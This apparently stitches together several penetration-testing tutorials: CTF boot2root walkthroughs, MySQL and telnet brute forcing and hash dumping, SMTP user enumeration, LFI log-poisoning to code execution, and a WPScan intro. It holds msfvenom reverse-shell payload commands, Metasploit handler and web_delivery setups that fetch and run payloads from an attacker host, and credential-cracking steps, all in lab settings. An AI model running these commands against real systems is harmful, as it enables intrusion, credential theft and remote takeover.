We find server sends a string in a comment, we find our file is in uploads folder and the comment in the response sent by server is the name of our file.

After finding our shell, we find 5^thflag. Now we use web_delivery to take reverse shell using metasploit.

We setup our metasploit for web delivery and execute the command on our shell.

Now we have the reverse shell we take a look inside 5^th flag

We find a base64 encode string when we decode it we find a string agentservices.

We check the connections of our server using netstat

Netstat –antp

We found a service running on port 7788, we use curl to find what the server is running on port 7788.

curl localhost:7788

We find a service called agent is running so we find the location of agent using which command

which agent

When we move into the folder we found a file called access_codes, we open it and find a few numbers. It looks like a sequence for port knock.

So we knock the server and find that port 7788 opened.

Knock 192.168.0.25 7482 8279 9467

Now we download agent program file to our system for reverse engineering.

Download agent /root/Desktop

Now we reverse engineer the file to find an exploit. First we disassemble main function.

gdb –q agent

disassemble main

We find that at memory address 80486ba, string compare function takes place so we add a break point there.

We break the program at 80486ba, and run the program. After running the programs, we look at the memory locations associated with the program.

break *0x80486ba

info registers

We look inside four halfwords of memory above stack pointer

x/4xw 0xffffd340

In the memory address 804c070 we found the password to access the program.

x/s 0x0804c070

Now we access the program from the server using netcat and find that the string can give us access to the program

netcat 192.168.0.25 7788

Now we create an exploit for this program, first we create a shellcode for msfvenom payload.

msfvenom –p linux/x86/meterpreter/reverse_tcp lhost=192.168.0.15 lport=4444 –f python –b \x00\xa0\x0d

Now we create our exploit using python. We manually fuzz the memory location inside our exploit.

We setup our handler on metesploit and execute the shell.

msf > use exploit/multi/handler

msf exploit (handler) > set payload linux/x86/meterpreter/reverse_shell

msf exploit (handler) > set lhost 192.168.0.15

msf exploit (handler) > set lport 4444

msf exploit (handler) > run

now we check for sessions and take the interactive shell

msf exploit (handler) > sessions

msf exploit (handler) > sessions –I 3

Now we take shell check our privileges, we find that we are root. When we move inside the /root/ folder we find our 6^thand final flag.

Hello friends! Today we are going to take another CTF challenge known as thewall. The credit for making this vm machine goes to “Xerubus” and it is another boot2root challenge where we have to root the VM to complete the challenge. You can download this VM here.

Let’s Breach!!!

Let us start form getting to know the IP of VM (Here, I have it at 192.168.0.17 but you will have to find your own)

netdiscover

We did a nmap scan but it showed nothing. So we use arp to check if it is broadcasting anything.

arp –an

We found that it is broadcasting something on the network, so we use wireshark to check at which port it is broadcasting the data.

We found that it is broadcasting something at port 1337 so we use netcat to listen at port 1337.

nc –lvp 1337

We found it was broadcasting something related to pink Floyd, we again do a nmap scan to check if it affected anything.

nmap -sV 192.168.0.17

As we can see that port 80 is open, so we open this ip in our browser.

We take a look at the source code of the browser and find a hexadecimal encoded string.

When we decode it we find a md5 encoded string and hint to do stegnography.

We decode the md5 encoded string and found a string called divisionbell

We download the image from the webpage and using steghide we check if something is hidden behind the image. When try to extract information it prompts for password using the string we decoded above we are able to find that a text file is hidden behind the image and are able to extract it.

steghide –info pink_floyd.jpg

steghide extract –sf pink_floyd.jpg

When we open the text file we find a base64 encoded string and md5 encoded string and a hint to use it at port 1965.

First we decode the base64 encoded string and found the string SydBarret.

Then we decode the md5 encoded string and found the string pinkfloydrocks.

Port enumeration on 1965 shows it is running openssh, we check if we can login using this as username:SydBarret and password:pinkfloydrocks.

When we try to login it shows us that we can only connect through sftp. So we use SydBarrettas username and pinkfloydrocks as password to login through sftp.

Now that we are inside, we find a file called eclipsed_by_the_moon, we download it to our system

We check what kind of file it is, we find that it is a zip file, we extract it using tar.

file eclipsed_by_the_moon

tar xvfz eclipsed_by_the_moon

After extracting the file, we check what kind of file it is and find that it is a boot sector.

file eclipsed_by_the_moon.lsd

We check if we can recover any file inside the boot sector using testdisk.

testdisk eclipsed_by_the_moon.lsd

We select the image to recover files from.

We select none portioned media as it is a boot sector.

We go to advanced to recover file from the image.

We then select the partition in which we want to extract the file from and select undelete to recover the files.

We find that an image file is recovered, we copy it.

We select the directory of our system in which we want to copy the file.

We check the image we just recovered and find the picture of Roger Waters, we also got a password inside the image.

We login trough ssh, enumerating the username we find that RogerWaters is the username and password is hello_is_there_anybody_in_there.

After getting in, we find that there are different directory for different users of pink floyd band members.

ls -al

We also find that we have limited access and cannot access their directories so we check for binaries available to other users and find that user NickMasonand DavidGilmour have binaries called brick and shineon available to them.

find / -user DavidGilmour 2>/dev/null

find / -user NickMason 2>/dev/null

We don’t have access to run the binary shineon but when we run brick it asks us a question. When we answer it correctly we become the user NickMason.

Now we can access the directory NickMason/. We find an image file inside we use scp to send it to our local system.

scp nick_mason_profile_pic.jpg root@192.168.0.16:/root/Desktop

We check the file type and find that it is an audio file. We change the file from .jpg to .ogg

When we listen to the audio, we find that morse code is also playing in the background along with the music. We cut the frequency of the audio to retrieve the morse code.

.-. .. -.-. …. .- .-. -.. .-- .-. .. --. …. - .---- ----. ….- …-- ..-. .. … .-

We find that the morse code translates to richardwright1943farfisa. We use RichardWright as username and 1943farfisa as password to login as user RichardWright.

Now we try to run the binary shineon, after running the binary we find that we can change the folder with symbolic link from DavidGilmour to RichardWright.

ln –s /bin/ksh /tmp/mail

export PATH:/tmp:$PATH

When we now run the shineon we become user DavidGilmour.

Inside DavidGilmour/folder we find a link inside the file.

When we open this link on the browser we find an image on which something is written.

When we decrease the contrast of the image, we find a hexadecimal string.

Then we also send the image file that we find inside the DavidGilmour/ folder using scp.

scp david_gilmour_profile_pic.jpg root@192.168.0.16:/root/Desktop/

We then find strings inside the image file and found string who_are_you_and_who_am_i.

Now we use DavidGilmour as username and who_are_you_and_who_am_i as password.

We now are in welcometothemachine group; we move inside /var/www/htdocs/welcometothemachine/.

We find a file called PinkFloyd, we run the file and find it asks a question. We use the hexadecimal string inside the image we find on the webpage.

Now we are given the permission to get root, as DavidGilmour is added into sudoers after running this program.

Now when we enter root/ directory and we find the flag stating the end of the VM challenge.

In this article we are discussing MYSQL penetration testing using Nmap where you will learn how to retrieve database information such as database name, table’s records, username, password and etc.

MySQL is an open Source for Relational Database Management System that uses structured query language for generating database record.

Lets Begin !!!

Scanning for port 3306

open the terminal and type following command to check mysql service is activated on targeted system or not, basically mysql service is activated on default port 3306.

Nmap –sT 192.168.1.216

From given image you can observe port 3306 is open for mysql service, now lets enumerate it

Retrieve mysql information

Now type another command to retrieve mysql information such as version, protocol and etc:

Nmap –script=mysql-info 192.168.1.216

Above command try to connect to with MySQL server and hence prints information such as the protocol: 10, version numbers: 5.5.57 -0ubuntu0.14.04.1, thread ID: 159, status: autocommit, capabilities, and the password salt as shown in given below image.

Brute force attack

This command will use dictionary for username and password and then try to match the username and password combination by making brute force attack against mysql.

Nmap –p 3306 –script mysql-brute –script-args userdb=/root/Desktop.lst,passdb=/root/Desktop/pass.lst 192.168.1.216

From given image you can observe that it found the valid credential root: toor. This credential will help in directly login into MYSQL server.

Retrieve mysql user names

This command will fetch mysql users name which help of given argument mysqluser root and mysqlpass toor.

Nmap –p 3306 –script=mysql-users 192.168.1.216 –script-args mysqluser=root,mysqlpass=toor

From given below image you can see we had found four user names: root, debian-sys-maint, sr, st.

Retrieve database names

This command will fetch mysql database name which help of given argument mysqluser root and mysqlpass toor.

Nmap –p 3306 –script=mysql-databases 192.168.1.216 –script-args mysqluser=root,mysqlpass=toor

From given below image you can read the name of created database such as ignite

This command will also perform same task as above but retrieve database name using mysql query “show database”

Nmap –p 3306 192.168.1.216 –script mysql-query –script-args “query=show databases,username=root,password=toor”

From given below image you can read the name of created database such as ignite

Retrieve mysql variable status ON/OFF

When we want to pass a value from one SQL statement to another SQL statement, then we store the value in a MySQL user-defined variable.

This command will fetch mysql variables name which help of given argument mysqluser root and mysqlpass toor.

Nmap –p 3306 –script=mysql-variables 192.168.1.216 –script-args mysqluser=root,mysqlpass=toor

From given image you can observe ON/OFF status for mysql variable.

Retrieve Hash password

This command will Dumps the password hashes from a MySQL server in a format suitable for cracking by tools such as John the Ripper.

Nmap –p 3306 –script=mysql-variables 192.168.1.216 –script-args mysqluser=root,mysqlpass=toor

From given image you can observe that it has dumped the hash value of passwords of respective user which we have enumerated above.

Hello friends!! Today we are discussing internal penetration testing on MYSQL server. In our previous article we had already discussed how to configure of mysql in ubuntu which you can read from here, now moving towards for its penetration testing.

Attacker: kali Linux

Target: ubuntu 14.04.1 (mysql server), IP: 192.168.1.216

Lets start !!

Scanning MYSQL

Scanning plays an important role in penetration testing because through scanning attacker make sure which services and open ports are available for enumeration and attack.

Here we are using nmap for scanning port 3306.

nmap -sT 192.168.1.216

If service is activated in targeted server then nmap show open STATE for port 3306.

Enumerating MYSQL Banner

Open the terminal in your kali Linux and Load metasploit framework; now type following command to scan for MYSQL version.

use auxiliary/scanner/mysql /mysql _version

msf auxiliary(mysql_version) > set rhosts 192.168.1.216

msf auxiliary(mysql_version) > set rport 3306

msf auxiliary(mysql_version) > run

From given image you can read the highlighted text which is showing MYSQL 5.5.57 is the installed version of MYSQL with protocol 10 on ubuntu 14.04.1 operating system.

MYSQL Brute Force Attack

An attacker always tries to make brute force attack for stealing credential for unauthorized access.

This module simply queries the MySQL instance for a specific user/pass (default is root with blank).

msf > use auxiliary/scanner/mysql/mysql_login

msf auxiliary(mysql_login) > set rhosts 192.168.1.216

msf auxiliary(mysql_login) > set rport 3306

msf auxiliary(mysql_login) > set user_file /root/Desktop/users.txt

msf auxiliary(mysql_login) > set pass_file /root/Desktop/password.txt

msf auxiliary(mysql_login) > run

This will start brute force attack and try to match the combination for valid username and password using user.txt and pass.txt file.

From given image you can observe that our mysql server is not secure against brute force attack because it is showing matching combination of username: root and password: toor for login.

Once the attacker retrieves the valid credential he can directly login into mysql server for stealing or destroying the database information.

Stealing MYSQL information using metasploit

This module allows for simple SQL statements to be executed against a MySQL instance given the appropriate credentials.

use auxiliary/admin/mysql/mysql_sql

msf auxiliary(mysql_sql) > set rhost 192.168.1.216

msf auxiliary(mysql_sql) > set username root

msf auxiliary(mysql_sql) > set password toor

msf auxiliary(mysql_sql) > set SQL show databases;

msf auxiliary(mysql_sql) > run

From given image you can observe that it has executed the sql query for dumping the name of databases.

This module extracts the schema information from a MySQL DB server.

use auxiliary/scanner/mysql/mysql_schemadump

msf auxiliary(mysql_schemadump) >set rhosts 192.168.1.216

msf auxiliary(mysql_schemadump) >set username root

msf auxiliary(mysql_schemadump) >set password toor

msf auxiliary(mysql_schemadump) >run

here it has dump the information schema for database “ignite” with table name “student” , 5 columns name with column types:

DB: ignite

Table name:student

Last Name

(varchar 30)

First Name

(varchar 30)

Student ID

(int 11)

Major

(varchar 20)

Dorm

(varchar 20)

Check file privileges

Open my.cnf file to verify file privileges using following command:

gedit /etc/mysql/my.cnf

Here you can see given below statements are uncommented

· Mysqld_safe

· Mysqld

· Secure_file _priv

If these statements are uncommented then it becomes very easy for attacker to perform file enumeration.

Mysql File Eumeration

This module will enumerate files and directories using the MySQL load_file feature.

Use auxiliary/scanner/mysql/mysql_file_enum

msf auxiliary(mysql_file_enum) > setrhosts 192.168.1.216

msf auxiliary(mysql_file_enum) > set username root

msf auxiliary(mysql_file_enum) > set password toor

msf auxiliary(mysql_file_enum) > set DIR_LIST/root/Desktop/file.txt

msf auxiliary(mysql_file_enum) > run

Here it will start identifying whether the given files list is exist in the target system or not.

From given image you can observe that it has found /etc, /var, /var/www such directory exists.

Enumerate writeable directories using the MySQL SELECT INTO DUMPFILE feature, for more information see the URL in the references. ***Note: For every writable directory found, a file with the specified FILE_NAME containing the text test will be written to the directory. ***

use auxiliary/scanner/mysql/mysql_writable_dirs

msf auxiliary(mysql_writable_dirs) > setrhosts 192.168.1.216

msf auxiliary(mysql_writable_dirs) > set username root

msf auxiliary(mysql_writable_dirs) > set password toor

msf auxiliary(mysql_writable_dirs) > set DIR_LIST/root/Desktop/file.txt

msf auxiliary(mysql_writable_dirs) > run

Here we had assign a list of files so that we can identify the writable directory and from given image you can observe that it has found writable permission only for /tmp.

Mysql User Enumeration

This module allows for simple enumeration of MySQL Database Server provided proper credentials to connect remotely.

use auxiliary/admin/mysql/mysql_enum

msf auxiliary(mysql_enum) > set rhost 192.168.1.216

msf auxiliary(mysql_enum) > set username root

msf auxiliary(mysql_enum) > set password toor

msf auxiliary(mysql_enum) > run

It will start retrieving information such as list of other user account and user privileges on mysql server.

From given image it will be clear to you, that it has shown list of account with hash password and list of user who have GRANT privileges.

As you can see other than user root it has some more user such as sr with hash password, here you can crack this password using password cracker tool.

This module extracts the usernames and encrypted password hashes from a MySQL server and stores them for later cracking.

use auxiliary/scanner/mysql/mysql_hashdump

msf auxiliary(mysql_hashdump) > set rhosts 192.168.1.216

msf auxiliary(mysql_hashdump) > set username root

msf auxiliary(mysql_hashdump) > set toor

msf auxiliary(mysql_hashdump) > exploit

Now from screenshot you can see the hash value of password is given for all users. Metasploit store these hash value inside /tmp folder and later use jonh the ripper for cracking password.

This module uses John the Ripper to identify weak passwords that have been acquired from the mysql_hashdump module. Passwords that have been successfully cracked are then saved as proper credentials

use auxiliary/analyze/jtr_mysql_fast

msf auxiliary(jtr_mysql_fast) >options

msf auxiliary(jtr_mysql_fast) >run

By default it will use metasploit wordlist where hash value has been saved and start cracking hash value.

If you notice the given below image you can perceive that it has successfully crack the double SHA-1 hashing and decrypt the password into plain text.

Now using above retrieved credential you can try to login into mysql server.

Here you can see we had successfully login into server. Hence attacker can easily breach the security of server and steal the important information or modify it.

Secure MYSQL through port forwarding

In order to secure mysql server admin can forward port from default to specific port to run the service. Open my.conf file using following command for making changes:

gedit /etc/mysql/my.conf

Now change port 3306 into any other port such as 3000 as shown in given image and save the changes and restart the service.

service mysql restart

Verify it using nmap command as given below:

nmap –sT 192.168.1.216

Prevent Mysql against brute force attack

In order to secure mysql server admin can bind the service to its localhost. Open my.conf file using following command for making changes:

gedit /etc/mysql/my.conf

Only you need to enable nind-address by making it uncomment as shown in given images.

service mysql rstart

Now let’s verify it by making brute force attack same as above using dictionary.

Great!!Attacker is not able to connect the server which resists brute attack also as shown in given image.

Admin should GRANT all privilege to a specific user only with specific IP address which prevents database information alteration from attackers.

Now for granting all privileges; login into mysql server and type following query:

Mysql> GRANT ALL PRIVILEGES ON *-* TO ‘root’@‘192.168.1.220’ IDENTIFIED BY ‘toor’ WITH GRANT OPTION;

To tell the server to reload the grant tables, perform a flush-privileges operation

Mysql > flush privileges;

Welcome to Internal penetration testing on telnet server where you will learn telnet installation and configuration, enumeration and attack, system security and precaution.

From Wikipedia

Telnet is a protocol used on the Internet or local area networks to provide a bidirectional interactive text-oriented communication facility using a virtual terminal connection. This protocol is used to establish a connection to Transmission Control Protocol (TCP) port number 23, where a Telnet server application (telnetd) is listening.

Let’s start!!!

Requirement

Telnet Server: ubuntu

Attacker system: Kali Linux

Telnet Installation & Configuration in 3 steps

Installing telnet server is very simple, it will get activated by following three steps:

1) Open the terminal in ubuntu and type given below command with root access.

apt-get install xinted telnet

1 Open ineted.conf file add given below statement inside it, then save it.

gedit /etc/inetd.conf

telnet stream tcp nowait telnetd /usr/sbin/tcpd /usr/sbin/in.telnetd

Now open xibetd.conf and add following line for configuration setting and save it.

gedit /etc/xinetd.conf

# Simple configuration file for xinetd

# Some defaults, and include /etc/xinetd.d/

defaults

{

# Please note that you need a log_type line to be able to use log_on_success

# and log_on_failure. The default is the following :

# log_type = SYSLOG daemon info

instances = 60

log_type = SYSLOG authpriv

log_on_success = HOST PID

log_on_failure = HOST

cps = 25 30

}

includedir /etc/xinetd.d

Now execute following command to restart the service.

sudo /etc/init.d/xinetd restart

Now you can ensure whether telnet service is getting activated or not and for this we had scan our own system with nmap.

nmap –p 23 127.0.0.1

If service is activated in targeted server then nmap show open STATE for port 23.

SSH Banner grabbing through telnet

A telnet play an important role in banner grabbing of other service running on target system. Open the terminal in kali Linux and type following command for finding the version of SSH service running on targeted machine.

telnet 192.168.0.106 22

From given image you can observe that it has successfully shown the SSH version “2.0-openSSH_6.6.1p1”has been installed on target machine.

SMTP Banner grabbing through telnet

Similarly we can also find out version and valid user of SMTP server using telnet. Execute following command and find out its version and valid user.

telnet 192.168.0.25 25

From given image you can observe that it has successfully shown “220 mail.ignite.lab ESMTP Postfix” has been installed on target machine.

You can guess for valid user account through following command and if you receive response code 550 it means unknown user account:

vrfy raj@mail.lab.ignite

If you received message code 250,251,252 which means server has accept the request and user account is valid.

But if you received message code 550 it means invalid user account as shown in given image

vrfy raaz@mail.ignite.lab

Telnet Banner Grabbing through Metasploit

Open the terminal in your kali Linux and Load metasploit framework; now type following command to scan for TELNET version.

use auxiliary/scanner/telnet/telnet_version

msf auxiliary(telnet_version) > set rhosts 192.168.0.106

msf auxiliary(telnet_version) > set rport 23

msf auxiliary(telnet_version) >set threads 5

msf auxiliary(telnet_version) > exploit

From given image you can read the highlighted text which is showing the installed version of TELNET on target’s system.

Brute Force Attack

An attacker always tries to make brute force attack for stealing credential for unauthorized access.

This module will test a telnet login on a range of machines and report successful logins. If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access.

Now type following command to Brute force TELNET login:

use auxiliary/scanner/telnet/telnet_login

msf auxiliary(telnet_login) > set rhosts 192.168.0.106

msf auxiliary(telnet_login) > set user_file /root/Desktop/user.txt

msf auxiliary(telnet_login) > set pass_file /root/Desktop/pass.txt

msf auxiliary(telnet_login) > set stop_on_success true

msf auxiliary(telnet_login) > exploit

From given image you can observe that our TELNET server is not secure against brute force attack because it is showing matching combination of username: raj and password: 123 for login simultaneously it has opened victims command shell as session 1.

From given image you can see now we have unauthorized access on victim’s system as raj@igniteand executed ifconfig to verify the network interface.

We can also convert command shell into meterpreter shell using following command

sessions –u 1

From given image you can see that now we are having two sessions; 1^st for command shell session and 2^nd for meterpreter session.

Stealing credential through sniffing

Telnet, by default, does not encrypt any data sent over the connection (including passwords), and so it is often feasible to eavesdrop on the communications and use the password later for malicious purposes; anybody who has access the network between the two hosts where Telnet is being used can intercept the packets passing between source and destination and obtain login, password and data information.

From given image you can observe that here the client is login into telnet server by submitting valid credential on other hand attacker is sniffing network packet using wireshark or other tools.

Here you can notice wireshark had captured telnet information by sniffing the network. It follow similar protocol as FTP where telnet users may authenticate themselves with a clear-text sign-in protocol for username and password. As result attacker can esaly sniff login credential.

From given below image you can read the username: raj and password: 123 moreover complete information travelling through packet between source to destination.

Since Telnet implementations do not support Transport Layer Security (TLS) security and Simple Authentication and Security Layer (SASL) authentication extensions. Therefore in favor of that the Secure Shell (SSH) protocol, first released in 1995 in replaced of Telnet.

Secure Telnet through Port forwarding

In order to secure telnet server admin can forward port from default to specific port to run the service. Open services file using following command for making changes:

gedit /etc/services

From given image you can perceive that telnet default uses port 23 for its services; change the port number for telnet service.

From given below image you can compare that we had changed port 23 with 2323, now restart the service.

service xinetd restart

Verify it using nmap command as given below:

nmap –p 2323 –sV 192.168.0.106

Secure telnet against brute force attack

You can secure telnet server against brute force and from unauthorized access by adding filter using Iptable. Allow only specific IP address to establish connection with telnet server and reject or drop the connection from other IP addresses.

Now type following command with root permission to add filter for telnet in iptables.

Iptables –A INPUT –s 192.168.0.104 –p tcp –dport 23 –j ACCEPT

Above command will allow the traffic from IP address 192.168.0.104 to access the telnet service on port 23.

Iptables –A INPUT –p tcp –dport 23 –j DROP

Above command with drop the service for traffic coming from other IP addresses on port 23.

Restart the service once you add filter in iptables

sudo /etc/init.d/xinetd restart

Let verify the working of Ipatble by connecting to telnet server from client machine holding IP address 192.168.0.104.

Great!!Connection established successfully.

You can confirm it from given below image.

Let verify the working of Ipatble by connecting to telnet server from attacker machine holding different IP address.

From given below image you can see nothing is happing here because port 23 is down for all other IP addresses

Awesome!! It means if attacker sniff the valid credential then also will not able to access the telnet server.

We can also find out version and valid user of SMTP server using telnet. Execute following command and find out its version and valid user.

Telnet

telnet 192.168.0.25 25

From given image you can observe that it has successfully shown “220 mail.ignite.lab ESMTP Postfix” has been installed on target machine.

You can guess for valid user account through following command and if you receive response code 550 it means unknown user account:

vrfy raj@mail.lab.ignite

If you received message code 250,251,252 which means server has accept the request and user account is valid.

But if you received message code 550 it means invalid user account as shown in given image

vrfy admin@mail.ignite.lab

Metasploit

The SMTP service has two internal commands that allow the enumeration of users: VRFY (confirming the names of valid users) and EXPN (which reveals the actual address of user’s aliases and lists of e-mail (mailing lists)). Through the implementation of these SMTP commands can reveal a list of valid users.

use auxiliary/scanner/smtp/smtp_enum

msf auxiliary(smtp_enum) > set rhosts 192.168.1.107

msf auxiliary(smtp_enum) > set rport 25

msf auxiliary(smtp_enum) > set USER_FILE /root/Desktop/user.txt

msf auxiliary(smtp_enum) > exploit

From given image you can read the valid username found in targeted server as well as it also grab SMTP banner.

smtp-user-enum

smtp-user-enum is a tool for enumerating OS-level user accounts on Solaris via the SMTP service (sendmail). Enumeration is performed by inspecting the responses to VRFY, EXPN and RCPT TO commands. It could be adapted to work against other vulnerable SMTP daemons, but this hasn’t been done as of v1.0.

Type following command to enumerate username using dictionary of usernames:

smtp-user-enum -M VRFY -U /root/Desktop/user.txt -t 192.168.1.107

-M: mode Method to use for username guessing EXPN, VRFY or RCPT

-U: file File of usernames to check via smtp service
-t: host Server host running smtp service

From given image you can see out of total 7 queries only 5 names are valid and exist in smtp server.

Type following command to verify user email address on mail server:

smtp-user-enum -M VRFY -D mail.ignite.lab -u raj -t 192.168.1.107

-D: dom Domain to append tosupplied user list to make email addresses;Use this option when you want to guess valid email addresses instead of just usernames.

From given image you can see it has shown raj@mail.ignite.lab is valid email ID for user raj.

iSMTP is the kali Linux toolw which is use for testing SMTP user enumeration (RCPT TO and VRFY), internal spoofing, and relay.

Type following command to enumerate valid email ID of targeted server:

ismtp -h 192.168.1.107:25 -e /root/Desktop/email.txt

-h The target IP and port (IP:port)

-e Enable SMTP user enumeration testing and imports email list.

From given image you can see blue color text refer to valid email account and red color text refer to invalid account.

In this article we are demonstrating how a PHP file with include function can lead to LFI log injection attack in any web server. Please read our previous article “Beginner Guide to File Inclusion Attack (LFI/RFI)”and “Configure Web Server for Penetration Testing (Beginner Guide)” that will help you in configuration of own web server as well as more about LFI vulnerability.

Attacker: Kali Linux

Target: ubuntu

Create a PHP file which will allow the user to include a file through file parameter. Hence using file parameter we can execute a file that contains malicious code to make unauthorized access is target PC. Download File from Here

Now I had saved given below PHP code inside a text file as lfi.php and saved on desktop.

Now login with user as “root” and create a folder “lfi” inside /var/www/html

cd /var/www/html

mkdir lfi

Move lfi.php file from desktop to /var/www/html using given below command.

mv /home/raj/Desktop/lfi.php .

Since we had added a php file with include function inside /var/www/html which allow to read the content of another file through it and can lead to LFI attack. Let’s demonstrate it by exploring following URL to read password files:

Localhost/lfi/lfi.php?file=/etc/passwd

From given image you can observe that above URL has dumped following result shown below.

Now I will try to open Apache access.log file through lfi.php on browser therefore give read permission to apache2 and then include the access.log file.

Now to include the acess.log file as file parameter and give following URL inside browser.

192.168.1.129/lfi/lfi.php?file=/var/log/apache2/access.log

From given image you can see it is showing created apache logs in browser. Now turn on burp suite to capture the request of same web page.

Here you will get intercepted data where we need to inject our cmd comment inside user-agent by replace highlighted data.

Add cmd comment inside user_Agent and send the request with GET parameter /lfi/lfi.php?file=/var/log/apache2/access.log&c=ps as shown in the below image. Then click on forward.

Here it will dump the log data as well as execute comment given through cmd. From screenshot you can view both log as well as process state.

In same manner execute ifconfigthrough cmd to verify network interface or can browse following url and view the result from inside the given screenshot.

192.168.1.129/lfi/lfi.php?file=/var/log/apache2/access.log&c=ifconfig

If you found such kind of vulnerability in any web application then you can use metasploit platform to exploit web server.

This module quickly fires up a web server that serves a payload. The provided command will start the specified scripting language interpreter and then download and execute the payload. The main purpose of this module is to quickly establish a session on a target machine when the attacker has to manually type in the command himself, e.g. Command Injection, RDP Session, Local Access or maybe Remote Command Exec. This attack vector does not write to disk so it is less likely to trigger AV solutions and will allow privilege escalations supplied by Meterpreter. When using either of the PSH targets, ensure the payload architecture matches the target computer or use SYSWOW64 powershell.exe to execute x86 payloads on x64 machines.

use exploit/multi/script/web_delivery

msf exploit (web_delivery)>set target 1

msf exploit (web_delivery)> set payload windows/meterpreter/reverse_tcp

msf exploit (web_delivery)> set lhost 192.168.0.104

msf exploit (web_delivery)>set srvport 8081

msf exploit (web_delivery)>exploit

Copy the highlighted text shown in below window

Paste the above copied malicious code inside URL as shown in given image and execute it as command.

When above code gets execute you will get meterpreter session 1.

msf exploit (web_delivery)>session –I 1

meterpreter> sysinfo

Hello friends! Today we are going to take another CTF challenge known as Primer. The credit for making this vm machine goes to “couchsofa” and it is another boot2root challenge where we have to root the VM to complete the challenge. You can download this VM here.

Let’s Breach!!!

Let us start form getting to know the IP of VM (Here, I have it at 192.168.1.115 but you will have to find our own)

netdiscover

Use nmap for port enumeration

nmap -sV 192.168.1.115

We found port 80 is open so we open this ip address in our browser.

We use dirb to list the directories and find robots.txt

dirb http://192.168.1.115/ -w

Inside the robots.txt we find a link to a page.

We open this link, it leads to page that has a story written on it.

We take a look at the source code at the and found another link.

When we open the link we found a link on the page.

When we open the link we are prompted for a password.

We capture the request of this page in burpsuite and and send it to repeater. In the response from the server, we find another link.

When we open the link we find another page that prompts for password.

Now we take a look at the url, it looks like md5 so we removed the first and underscore we find something interesting.

We find that the url are actually prime numbers converted into md5 hashes. We were at the 7 page, and the hash to that is 17. So we convert 19(next prime number) to md5 hash.

To open the it we add “8_” in front of the hash to complete the url. We open it in our browser and find a page.

We take a look at the source code and find another url.

We open it and find a custom made terminal that uses javascript to execute certain commands.

In the ~/usr/falken/ folder we find a hint, when we take a look at the processes we find a command that we need to run.

When we run connect falken@Erebus It prompts for password. We get a hint from the log files that the password might be related to Joshua. In the logs we find that his date of birth i 6^th august 1984. We use cupp to create a dictionary file.

We use burpsuite to bruteforce the password, we find that joshua1984 is the password.

When we login, we find a page again with terminal.

We check the files and find a few log files that are encoded. We use the decode command provided by the terminal to decode the files.

There we find our next clue, we googled trivial zero and found it was discovered by Riemann. We use cupp to create a dictionary with the given information.

We use burpsuite to bruteforce the password and find it to be Riemann.

When we login we are again prompted with another terminal.

When we look through the files we find the md5 encoded string for the usernames. We check for processes and again find a command.

When we crack the md5 password, we find that these are password for the respective username.

When we login, we are again prompted with another terminal.

Looking through the files we find username, password and hostname.

We use these to login and find a page greeting us for completing challenge.

In this article you will learn how make unauthorized access in a web server if it is suffering from local file inclusion vulnerability with help of auth log file. To perform this attack Please read our previous article “Beginner Guide to File Inclusion Attack (LFI/RFI)” and “Configure Web Server for Penetration Testing (Beginner Guide)” that will help you in configuration of own web server as well as more about LFI vulnerability.

Attacker: Kali Linux

Target: Ubuntu

Let’s Begin!!

I had saved given below PHP code inside a text file as lfi.php and saved on desktop.

Now login with user as “root” and create a folder “lfi” inside /var/www/html

cd /var/www/html

mkdir lfi

Move lfi.php file from desktop to /var/www/html using given below command.

mv /home/raj/Desktop/lfi.php .

localhost/lfi/lfi.php?file=/etc/passwd

From given image you can observe that above URL has dumped following result shown below.

Open terminal in your kali Linux and connect the target through SSH service

ssh user@192.168.1.129

From screenshot you can see I am connected with target system.

Type following command to view its logs:

tail -f /var/log/auth.log

From given below image you can check the details of generated logs for auth.log file.

Now I will try to openauth.log.log file through lfi.php on browser therefore give read and write permission to auth.log.

cd /var/log/

chmod 775 auth.log

Now to include the auth.log file as file parameter and give following URL inside browser.

192.168.1.129/lfi/lfi.php?file=/var/log/auth.log

From given image you can see it is showing created auth logs in browser also.

Since the auth.log file generates log for every success and failed login attempt when we try to connect with web server. Taking advantage of this feature now I will send malicious PHP code as fake user and it will get added automatically in auth.log file as new log.

ssh ‘’@192.168.1.129

Again when you will check its log, you will find the PHP code has been added as new log.

Type following command to view its logs:

tail -f /var/log/auth.log

Here it will dump the data of auth log as well as execute comment given through cmd; now execute ifconfig as cmd comment to verify network interface and confirm its result from inside the given screenshot.

192.168.1.129/lfi/lfi.php?file=/var/log/auth.log &c=ifconfig

If you found such kind of vulnerability in any web application then you can use metasploit platform to exploit web server.

use exploit/multi/script/web_delivery

msf exploit (web_delivery)>set target 1

msf exploit (web_delivery)> set payload php/meterpreter/reverse_tcp

msf exploit (web_delivery)> set lhost 192.168.1.123

msf exploit (web_delivery)>set srvport 8081

msf exploit (web_delivery)>exploit

Copy the highlighted text shown in below window

Paste the above copied malicious code inside URL as shown in given image and execute it as command.

When above code gets execute you will get meterpreter session 1 of targeted web server.

msf exploit (web_delivery)>sessions 1

meterpreter> sysinfo

In our previous article we had discussed “WordPress Penetration Testing Lab Setup in Ubuntu” and today you will learn wordpress penetration testing using WPSCAN and METASPLOIT.

Attacker:Kali Linux

Target:Wordpress

WPScan is a black box vulnerability scanner for WordPress written in PHP mainly focus on different types of vulnerability in WordPress, WordPress themes, and plugins. Well, WPScan tool is already installed by default in Kali Linux, SamuraiWTF, Pentoo, BlackArch, and BackBox Linux. WPScanuses the database of all the available plugins and themes (approximately over 18000 plugins and 2600 themes) during testing against the target to find outdated versions and vulnerabilities.

Things WPScan can do for you are:

Detect a version of currently installed WordPress.

-Can detect sensitive files like readme, robots.txt, database replacing files, etc.

-Detect enabled features on currently installed WordPress.

-Enumerate theme version and name.

-Detect installed plugins and can tell you if it is outdated or not.

-Enumerate user names also.

Let’s start.

Go to your Kali Linux terminal and type following to download wpscan from git hub.

cd Desktop

git clone https://github.com/wpscanteam/wpscan.git

Now simply type in terminal to run the script:

./wpscan.rb –h

Using default Option we will are going to penetrate our wordpress website:

e or –enumerate option use for Enumeration.

u usernames from id 1 to 10

u[10-20] usernames from id 10 to 20 (you must write [] chars)

p plugins

vp only vulnerable plugins

ap all plugins (can take a long time)

tt timthumbs

t themes

vt only vulnerable themes

at all themes (can take a long time)

Scanning wordpress version of target website

Wpscan is a great tool to scan wordpress websites. Now we will try to do some basic scan, we will use enumerate tools to find information about themes, plugins, usernames etc.

Now type following command to scan wordpress and its server:

./wpscan.rb –u http://192.168.0.101/wordpress/

Instead of http://192.168.0.101/wordpress/ type the name of a website you want to scan.

